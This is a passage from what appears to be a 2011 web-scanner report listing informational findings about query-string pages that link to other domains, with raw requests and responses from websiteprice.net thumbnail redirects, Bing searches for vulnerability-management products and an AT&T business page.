Location: http://open.thumbshots.org/image.pxf?url=http://www.austininsuranceguy.com
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 02 May 2011 02:09:35 GMT

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="http://open.thumbshots.org/image.pxf?url=http://www.austininsuranceguy.com">here</a>.</body>

23.47. http://websiteprice.net/thumb/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://websiteprice.net
Path:   /thumb/

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /thumb/?url_pic=www.gaychatsites.org HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: websiteprice.net

Response

HTTP/1.1 302 Object moved
Cache-Control: no-cache
Content-Length: 189
Content-Type: text/html
Expires: Mon, 02 May 2011 02:28:45 GMT
Location: http://open.thumbshots.org/image.pxf?url=http://www.gaychatsites.org
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 02 May 2011 02:29:44 GMT

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="http://open.thumbshots.org/image.pxf?url=http://www.gaychatsites.org">here</a>.</body>

23.48. http://websiteprice.net/thumb/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://websiteprice.net
Path:   /thumb/

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /thumb/?url_pic=onlinemicrofiche.com HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: websiteprice.net

Response

HTTP/1.1 302 Object moved
Cache-Control: no-cache
Content-Length: 189
Content-Type: text/html
Expires: Mon, 02 May 2011 02:08:12 GMT
Location: http://open.thumbshots.org/image.pxf?url=http://onlinemicrofiche.com
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 02 May 2011 02:09:12 GMT

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="http://open.thumbshots.org/image.pxf?url=http://onlinemicrofiche.com">here</a>.</body>

23.49. http://websiteprice.net/thumb/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://websiteprice.net
Path:   /thumb/

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /thumb/?url_pic=DUJUGAAD.COM HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: websiteprice.net

Response

HTTP/1.1 302 Object moved
Cache-Control: no-cache
Content-Length: 181
Content-Type: text/html
Expires: Mon, 02 May 2011 02:28:46 GMT
Location: http://open.thumbshots.org/image.pxf?url=http://DUJUGAAD.COM
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 02 May 2011 02:29:46 GMT

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="http://open.thumbshots.org/image.pxf?url=http://DUJUGAAD.COM">here</a>.</body>

23.50. http://websiteprice.net/thumb/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://websiteprice.net
Path:   /thumb/

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /thumb/?url_pic=www.no14u.bz HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: websiteprice.net

Response

HTTP/1.1 302 Object moved
Cache-Control: no-cache
Content-Length: 181
Content-Type: text/html
Expires: Mon, 02 May 2011 02:08:37 GMT
Location: http://open.thumbshots.org/image.pxf?url=http://www.no14u.bz
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 02 May 2011 02:09:36 GMT

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="http://open.thumbshots.org/image.pxf?url=http://www.no14u.bz">here</a>.</body>

23.51. http://websiteprice.net/thumb/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://websiteprice.net
Path:   /thumb/

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /thumb/?url_pic=bollywoodswimsuit.com HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: websiteprice.net

Response

HTTP/1.1 302 Object moved
Cache-Control: no-cache
Content-Length: 190
Content-Type: text/html
Expires: Mon, 02 May 2011 02:08:30 GMT
Location: http://open.thumbshots.org/image.pxf?url=http://bollywoodswimsuit.com
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 02 May 2011 02:09:30 GMT

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="http://open.thumbshots.org/image.pxf?url=http://bollywoodswimsuit.com">here</a>.</body>

23.52. http://websiteprice.net/thumb/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://websiteprice.net
Path:   /thumb/

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /thumb/?url_pic=www.howtoimprovecommunicationskills.net HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: websiteprice.net

Response

HTTP/1.1 302 Object moved
Cache-Control: no-cache
Content-Length: 208
Content-Type: text/html
Expires: Mon, 02 May 2011 02:08:32 GMT
Location: http://open.thumbshots.org/image.pxf?url=http://www.howtoimprovecommunicationskills.net
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 02 May 2011 02:09:32 GMT

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="http://open.thumbshots.org/image.pxf?url=http://www.howtoimprovecommunicationskills.net">here</a>.
...[SNIP]...

23.53. http://websiteprice.net/thumb/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://websiteprice.net
Path:   /thumb/

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following link to another domain:

Request

GET /thumb/?url_pic=forexnirvana.com HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: websiteprice.net

Response

HTTP/1.1 302 Object moved
Cache-Control: no-cache
Content-Length: 185
Content-Type: text/html
Expires: Mon, 02 May 2011 02:08:40 GMT
Location: http://open.thumbshots.org/image.pxf?url=http://forexnirvana.com
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 02 May 2011 02:09:39 GMT

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="http://open.thumbshots.org/image.pxf?url=http://forexnirvana.com">here</a>.</body>

23.54. http://websiteprice.net/thumb/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://websiteprice.net
Path:   /thumb/

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following link to another domain:

Request

GET /thumb/?url_pic=williger.com HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: websiteprice.net

Response

HTTP/1.1 302 Object moved
Cache-Control: no-cache
Content-Length: 181
Content-Type: text/html
Expires: Mon, 02 May 2011 02:28:45 GMT
Location: http://open.thumbshots.org/image.pxf?url=http://williger.com
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 02 May 2011 02:29:44 GMT

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="http://open.thumbshots.org/image.pxf?url=http://williger.com">here</a>.</body>

23.55. http://www.bing.com/search

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /search

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /search?q=vulnerability+management&go=&form=QBLH&qs=n&sk=&sc=8-0 HTTP/1.1
Host: www.bing.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110423; SRCHUID=V=2&GUID=D58F516F401B4DFBA034B7592B1777FD; _UR=; s_nr=1303567291710; s_vnum=1306159291712%26vn%3D2; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; countrycode=US; zipcode=75207; _HOP=; RMS=F=GgAg&A=AAAAAAAAAAAQ; _SS=SID=54196B2489E649DC9D985351F7EDDDA0&CW=983&CH=903&bIm=926; SRCHD=MS=1752452&SM=1&D=1740336&AF=NOFORM; MUID=B506C07761D7465D924574124E3C14DF

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Date: Sun, 01 May 2011 23:32:44 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 54088

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:Web="h
...[SNIP]...
<li><a href="http://www.msn.com/" onmousedown="return si_T('&amp;ID=FD,39.1')">MSN</a></li><li><a href="http://mail.live.com/" onmousedown="return si_T('&amp;ID=FD,41.1')">Hotmail</a>
...[SNIP]...
<h3><a href="http://0.r.msn.com/?ld=4v-pZZqp5PXPxPr2jYxibkwwnB-22O5wIuL9Rzhh78fqUZESO-SNAN1I0p1RZh9VzMKmHl3T_uqiCOJ5FNzwIPuGT5pPBglXL7vsTpG3rmBi8JPX-kGW7cmavEn8vLA8ZUpDfgXYfYMzbr2_h_RClpMCw5bbyCsdCJ-ZAvL8O210BJOjVSygfjXf7m9NrUvzuY_8Hk0eCy2RfmsNjjtsHfYlbjsqqMmQfQuSowlRNdr8M1VAlMMdO-vpb2zhIfHpI866llWxAmY3M9V1EGQfR9Js8RDB7fndDI9tUiQv3sCRfiAXJX94SMuOw" onmousedown="return si_T('&amp;ID=FD,58.1,Ads')">AT&amp;T... Official Site</a>
...[SNIP]...
<h3><a href="http://0.r.msn.com/?ld=4vlfimJWHOSoAG3PfwIh_kJRdllL3F5-o10FPT47q_IWBjrLiueJBDF0U5Dwzq7Y6YfLDJpKC4aJkPg0-hN_0iOcr6o2VXRw93vLwE4JgUrgtSouES4BG05tmlYaeWNIB-FrOo2zqN30arps-BmWfevhnAgRBhd2bQ7zCGpjlfyecT0H8nxj98iGp61_TmM6YA_SkkOpef7dME8BPU_6EHXj8nbGt5hYNuj5Kt5DdAZ6kyXNuYJJTw5rUd00d2p8z9RCFd-9LpGJrjOiEvlhyNEf6ZuSftbgFELTnpFC-ug_c1VAlMa4CLF5Vg2fbAn9ODACF2xxAmY3M9WLROFrG9IPaITglXKXQUhGEMFSUJHZKNqN_vjrCmpcs" onmousedown="return si_T('&amp;ID=FD,60.1,Ads')"><strong>
...[SNIP]...
<h3><a href="http://en.wikipedia.org/wiki/Vulnerability_management" onmousedown="return si_T('&amp;ID=SERP,5071.1')"><strong>
...[SNIP]...
<li><a href="http://en.wikipedia.org/wiki/Vulnerability_management#Vulnerability_Management_Programs" onmousedown="return si_T('&amp;ID=SERP,5056.1')"><strong>
...[SNIP]...
<li><a href="http://en.wikipedia.org/wiki/Vulnerability_management#Vulnerability_Management_for_Applications_Versus_Hosts_and_Infrastructure" onmousedown="return si_T('&amp;ID=SERP,5057.1')"><strong>
...[SNIP]...
<li><a href="http://en.wikipedia.org/wiki/Vulnerability_management#Managing_Known_Vulnerabilities_Versus_Unknown_Vulnerabilities" onmousedown="return si_T('&amp;ID=SERP,5058.1')"><strong>
...[SNIP]...
<h3><a href="http://news.yahoo.com/s/prweb/20110427/bs_prweb/prweb5276794" onmousedown="return si_T('&amp;ID=SERP,5091.1')">eEye to Showcase IT Security Solutions that Simplify <strong>
...[SNIP]...
<h3><a href="http://csrc.nist.gov/publications/nistpubs/800-40-Ver2/SP800-40v2.pdf" onmousedown="return si_T('&amp;ID=SERP,5109.1')">Creating a Patch and <strong>
...[SNIP]...
<div><a href="http://www.siliconrepublic.com/new-media/item/21548-dutch-are-biggest-twitter/" onmousedown="return si_T('&amp;ID=SERP,5305.1')"><img height="80" id="fdemb_0" src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAEALAAAAAABAAEAAAIBTAA7" title="Dutch are biggest Twitter, LinkedIn users - Silicon Republic" width="80" />
...[SNIP]...
<h5><a href="http://www.newswiretoday.com/news/89806/The_Netherlands_1_Real_Estate_Company_Selects_OUTSCAN_for_Vulnerability_Assessment_and_Management/" onmousedown="return si_T('&amp;ID=SERP,5310.1')">The Netherlands #1 Real Estate Company Selects OUTSCAN for <strong>
...[SNIP]...
<h5><a href="http://www.24-7pressrelease.com/press-release/the-netherlands-1-real-estate-website-relies-on-outscan-for-vulnerability-assessment-and-management-210624.php" onmousedown="return si_T('&amp;ID=SERP,5313.1')">The Netherlands #1 Real Estate Website Relies on OUTSCAN for <strong>
...[SNIP]...
<h5><a href="http://insurancenewsnet.com/article.aspx?id=257992" onmousedown="return si_T('&amp;ID=SERP,5316.1')">eEye to Showcase IT Security Solutions that Simplify <strong>
...[SNIP]...
<h3><a href="http://www.cnbc.com/id/42746847/" onmousedown="return si_T('&amp;ID=SERP,5130.1')">Rapid7 Receives Highest Possible Rating of 'Strong Positive' in ...</a>
...[SNIP]...
<h3><a href="http://www.qualys.com/products/qg_suite/vulnerability_management/" onmousedown="return si_T('&amp;ID=SERP,5149.1')">QualysGuard&#174; <strong>
...[SNIP]...
<h3><a href="http://www.gartner.com/DisplayDocument?doc_cd=127481" onmousedown="return si_T('&amp;ID=SERP,5167.1')">Improve IT Security With <strong>
...[SNIP]...
<h3><a href="http://www.itworld.com/security/154195/vulnerability-management-not-just-scanning-known-vulnerabilities" onmousedown="return si_T('&amp;ID=SERP,5186.1')"><strong>
...[SNIP]...
<h3><a href="http://www.rapid7.com/" onmousedown="return si_T('&amp;ID=SERP,5240.1')"><strong>
...[SNIP]...
<h3><a href="http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-1719" onmousedown="return si_T('&amp;ID=SERP,5263.1')">National <strong>
...[SNIP]...
<h3><a href="http://www.qualys.com/solutions/vulnerability_management/" onmousedown="return si_T('&amp;ID=SERP,5281.1')"><strong>
...[SNIP]...
<h3><a href="http://0.r.msn.com/?ld=4v-pZZqp5PXPxPr2jYxibkwwnB-22O5wIuL9Rzhh78fqUZESO-SNAN1I0p1RZh9VzMKmHl3T_uqiCOJ5FNzwIPuGT5pPBglXL7vsTpG3rmBi8JPX-kGW7cmavEn8vLA8ZUpDfgXYfYMzbr2_h_RClpMCw5bbyCsdCJ-ZAvL8O210BJOjVSygfjXf7m9NrUvzuY_8Hk0eCy2RfmsNjjtsHfYlbjsqqMmQfQuSowlRNdr8M1VAlMMdO-vpb2zhIfHpI866llWxAmY3M9V1EGQfR9Js8RDB7fndDI9tUiQv3sCRfiAXJX94SMuOw" onmousedown="return si_T('&amp;ID=FD,63.1,Ads')">AT&amp;T... Official Site</a>
...[SNIP]...
<h3><a href="http://0.r.msn.com/?ld=4vlfimJWHOSoAG3PfwIh_kJRdllL3F5-o10FPT47q_IWBjrLiueJBDF0U5Dwzq7Y6YfLDJpKC4aJkPg0-hN_0iOcr6o2VXRw93vLwE4JgUrgtSouES4BG05tmlYaeWNIB-FrOo2zqN30arps-BmWfevhnAgRBhd2bQ7zCGpjlfyecT0H8nxj98iGp61_TmM6YA_SkkOpef7dME8BPU_6EHXj8nbGt5hYNuj5Kt5DdAZ6kyXNuYJJTw5rUd00d2p8z9RCFd-9LpGJrjOiEvlhyNEf6ZuSftbgFELTnpFC-ug_c1VAlMa4CLF5Vg2fbAn9ODACF2xxAmY3M9WLROFrG9IPaITglXKXQUhGEMFSUJHZKNqN_vjrCmpcs" onmousedown="return si_T('&amp;ID=FD,65.1,Ads')"><strong>
...[SNIP]...
<h3><a href="http://1188110.r.msn.com/?ld=4vCHtS_uXEIeo96a3p5ur8EHeK6E2UMMS2W7lvVVqf9k_6OyA1uLOEc_RSovzlSGele_i8oUpTWlxEUal5sKN9XYJRDr8lz8qXyXacB1AVgOENi0_2LjiZcitAhkh4HVfKTfqvGUtT94zc2jM8j-rDjWLK16p15xd37HHeDm02fbhVeYQ2CGNEi2Z-ffIbpb6xdrbLavs7VWl2mJJwMjhvkWqxfQWRvim-AcNJSZ9Dh8LMan_Uhk2ZsYy-QLnVMcZq1wMDg93SjKPG4Pm2PWtPCh8cigXR6sAjkjYXAw9ac5WptSe_2v2xtGp8NowTatUrNVQJTAqhy0D1_1_R0wgjnvJybmAQJmNzPVg9TJ9UUnEt0DGnsIXLqHj2iT1ux4t3VcXvEw0z3qTK" onmousedown="return si_T('&amp;ID=FD,69.1,Ads')">Hiring Immediately</a>
...[SNIP]...
<div><a href="http://advertising.microsoft.com/search/" class="sb_adMktA" onmousedown="return si_T('&amp;ID=FD,67.1,Ads')">See your message here</a>
...[SNIP]...
<li><a href="http://go.microsoft.com/fwlink/?LinkId=74170" onmousedown="return si_T('&amp;ID=FD,127.1')">Privacy</a> | </li><li><a href="http://g.msn.com/0TO_/enus" onmousedown="return si_T('&amp;ID=FD,129.1')">Legal</a> | </li><li><a href="http://advertising.microsoft.com/advertise-on-bing" onmousedown="return si_T('&amp;ID=FD,131.1')">Advertise</a>
...[SNIP]...
<li><a href="http://g.msn.com/AIPRIV/en-us" target="_blank" onmousedown="return si_T('&amp;ID=FD,133.1')">About our ads</a>
...[SNIP]...
<li><a href="http://onlinehelp.microsoft.com/en-US/bing/ff808535.aspx" id="sb_help" target="_blank" onmousedown="return si_T('&amp;ID=FD,135.1')">Help</a> | </li><li><a href="https://feedback.live.com/default.aspx?locale=en-US&amp;productkey=wlsearchweb&amp;P1=dsatweb&amp;P2=vulnerability+management&amp;P3=cfcache&amp;P4=QBLH&amp;P5=B506C07761D7465D924574124E3C14DF&amp;P6=Washington, District Of Columbia&amp;P9=38.906898498%2f-77.028396606&amp;P10=0&amp;P11=http%3a%2f%2fwww.bing.com%2f&amp;searchtype=Web+Search&amp;optl1=1&amp;backurl=http%3a%2f%2fwww.bing.com%2fsearch%3fq%3dvulnerability+management%26go%3d%26qs%3dn%26sk%3d%26sc%3d8-0%26FORM%3dFEEDTU" id="sb_feedback" onclick="si_fb.openCard(this);return false" onfocus="si_fb.loadCard()" onmousedown="return si_T('&amp;ID=FD,137.1')">Tell us what you think</a>
...[SNIP]...

23.56. http://www.bing.com/search

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /search

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /search?q=outscan&go=&form=QBRE&qs=n&sk= HTTP/1.1
Host: www.bing.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/search?q=vulnerability+management&go=&form=QBLH&qs=n&sk=&sc=8-0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110423; SRCHUID=V=2&GUID=D58F516F401B4DFBA034B7592B1777FD; _UR=; s_nr=1303567291710; s_vnum=1306159291712%26vn%3D2; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; countrycode=US; zipcode=75207; _HOP=; SRCHD=MS=1752452&SM=1&D=1740336&AF=NOFORM; MUID=B506C07761D7465D924574124E3C14DF; RMS=F=OgAg&A=SAAAAAAAAAAQ; _SS=SID=54196B2489E649DC9D985351F7EDDDA0&CW=987&CH=887&bIm=926&hIm=688

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Date: Sun, 01 May 2011 23:33:35 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 32929

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:Web="h
...[SNIP]...
<li><a href="http://www.msn.com/" onmousedown="return si_T('&amp;ID=FD,39.1')">MSN</a></li><li><a href="http://mail.live.com/" onmousedown="return si_T('&amp;ID=FD,41.1')">Hotmail</a>
...[SNIP]...
<h3><a href="http://www.outpost24.com/products-outscan.html" onmousedown="return si_T('&amp;ID=SERP,5057.1')"><strong>
...[SNIP]...
<h3><a href="http://www.newswiretoday.com/news/89806/The_Netherlands_1_Real_Estate_Company_Selects_OUTSCAN_for_Vulnerability_Assessment_and_Management/" onmousedown="return si_T('&amp;ID=SERP,5075.1')">The Netherlands #1 Real Estate Company Selects <strong>
...[SNIP]...
<h3><a href="http://www.prlog.org/11463569-the-netherlands-1-real-estate-website-relies-on-outscan-for-vulnerability-assessment-and-management.html" onmousedown="return si_T('&amp;ID=SERP,5104.1')">The Netherlands #1 Real Estate Website Relies on <strong>
...[SNIP]...
<div><a href="http://www.expatica.com/nl/essentials_moving_to/essentials/Working-in-the-Netherlands_13058.html" onmousedown="return si_T('&amp;ID=SERP,5306.1')"><img height="80" id="fdemb_0" src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAEALAAAAAABAAEAAAIBTAA7" title="Working in the Netherlands (part I) - Expatica" width="80" />
...[SNIP]...
<h5><a href="http://www.24-7pressrelease.com/press-release/the-netherlands-1-real-estate-website-relies-on-outscan-for-vulnerability-assessment-and-management-210624.php" onmousedown="return si_T('&amp;ID=SERP,5311.1')">The Netherlands #1 Real Estate Website Relies on <strong>
...[SNIP]...
<h5><a href="http://www.newswiretoday.com/news/89806/The_Netherlands_1_Real_Estate_Company_Selects_OUTSCAN_for_Vulnerability_Assessment_and_Management/" onmousedown="return si_T('&amp;ID=SERP,5314.1')">The Netherlands #1 Real Estate Company Selects <strong>
...[SNIP]...
<h5><a href="http://www.melodika.net/index.php?option=com_content&amp;task=view&amp;id=150446&amp;Itemid=55" onmousedown="return si_T('&amp;ID=SERP,5317.1')">Outpost24 Extends International Presence to the APAC Region</a>
...[SNIP]...
<h3><a href="http://www.outpost24.com/products-outscan-pci.html" onmousedown="return si_T('&amp;ID=SERP,5132.1')"><strong>
...[SNIP]...
<h3><a href="http://news.thomasnet.com/companystory/Outpost24-AB-Releases-a-Major-Update-to-OUTSCAN-804065" onmousedown="return si_T('&amp;ID=SERP,5151.1')">Outpost24 AB Releases a Major Update to <strong>
...[SNIP]...
<h3><a href="http://www.outpost24.dk/solutions-pci-compliance.html" onmousedown="return si_T('&amp;ID=SERP,5179.1')">PCI Compliance | Solutions | Outpost24</a>
...[SNIP]...
<h3><a href="http://chartsaver.com/" onmousedown="return si_T('&amp;ID=SERP,5201.1')"><strong>
...[SNIP]...
<h3><a href="https://community.mcafee.com/thread/16756" onmousedown="return si_T('&amp;ID=SERP,5219.1')">McAfee Communities: Error Loading Outlook 2007 ...</a>
...[SNIP]...
<h3><a href="http://world-scan.com/" onmousedown="return si_T('&amp;ID=SERP,5247.1')">Document Management from World-SCAN, Inc.</a>
...[SNIP]...
<h3><a href="http://www.immunesecurity.com/" onmousedown="return si_T('&amp;ID=SERP,5275.1')">ImmuneSecurity - SIEM</a>
...[SNIP]...
<h5><a href="http://www.1888pressrelease.com/the-netherlands-1-real-estate-website-relies-on-outscan-for-pr-298443.html" onmousedown="return si_T('&amp;ID=SERP,5293.1')">The Netherlands #1 Real Estate Website Relies on <strong>
...[SNIP]...
<h5><a href="http://www.1888pressrelease.com/gerstein-global-futures-expands-e-commerce-in-asia-pacific-u-pr-298444.html" onmousedown="return si_T('&amp;ID=SERP,5294.1')">Gerstein Global Futures Expands e-Commerce in Asia Pacific...</a>
...[SNIP]...
<h5><a href="http://www.openpr.com/news/173022/Risk-based-Auditing-Workshop-at-the-12th-Annual-Regional-Gulf-Audit-Conference.html" onmousedown="return si_T('&amp;ID=SERP,5295.1')">Risk-based Auditing Workshop at the 12th Annual Regional...</a>
...[SNIP]...
<li><a href="http://go.microsoft.com/fwlink/?LinkId=74170" onmousedown="return si_T('&amp;ID=FD,103.1')">Privacy</a> | </li><li><a href="http://g.msn.com/0TO_/enus" onmousedown="return si_T('&amp;ID=FD,105.1')">Legal</a> | </li><li><a href="http://advertising.microsoft.com/advertise-on-bing" onmousedown="return si_T('&amp;ID=FD,107.1')">Advertise</a>
...[SNIP]...
<li><a href="http://g.msn.com/AIPRIV/en-us" target="_blank" onmousedown="return si_T('&amp;ID=FD,109.1')">About our ads</a>
...[SNIP]...
<li><a href="http://onlinehelp.microsoft.com/en-US/bing/ff808535.aspx" id="sb_help" target="_blank" onmousedown="return si_T('&amp;ID=FD,111.1')">Help</a> | </li><li><a href="https://feedback.live.com/default.aspx?locale=en-US&amp;productkey=wlsearchweb&amp;P1=dsatweb&amp;P2=outscan&amp;P3=cfcache&amp;P4=QBRE&amp;P5=B506C07761D7465D924574124E3C14DF&amp;P6=Washington, District Of Columbia&amp;P9=38.906898498%2f-77.028396606&amp;P10=0&amp;P11=http%3a%2f%2fwww.bing.com%2fsearch%3fq%3dvulnerability%2bmanagement%26go%3d%26form%3dQBLH%26qs%3dn%26sk%3d%26sc%3d8-0&amp;searchtype=Web+Search&amp;optl1=1&amp;backurl=http%3a%2f%2fwww.bing.com%2fsearch%3fq%3doutscan%26go%3d%26qs%3dn%26sk%3d%26FORM%3dFEEDTU" id="sb_feedback" onclick="si_fb.openCard(this);return false" onfocus="si_fb.loadCard()" onmousedown="return si_T('&amp;ID=FD,113.1')">Tell us what you think</a>
...[SNIP]...

23.57. http://www.business.att.com/enterprise/Family/network-security/threat-vulnerability-management/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.business.att.com
Path:   /enterprise/Family/network-security/threat-vulnerability-management/

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /enterprise/Family/network-security/threat-vulnerability-management/?GUID=F7BA3C75-6B83-4966-96A6-0F35574C4352&WT.srch=1 HTTP/1.1
Host: www.business.att.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cust_type=new; svariants=NA; ECOM_GTM=owaln_osaln; bn_u=6923522882713032529; op704wirelesssearchlandingpage1gum=a005005004274ri19c6a28261; DTAB=Tab=Bus; colam_ctn=l%3Den_US; browserid=A001533839947

Response

HTTP/1.1 200 OK
Last-Modified: Sun, 01 May 2011 23:32:53 GMT
Server: Sun-ONE-Web-Server/6.1
Date: Sun, 01 May 2011 23:32:53 GMT
Content-Type: text/html
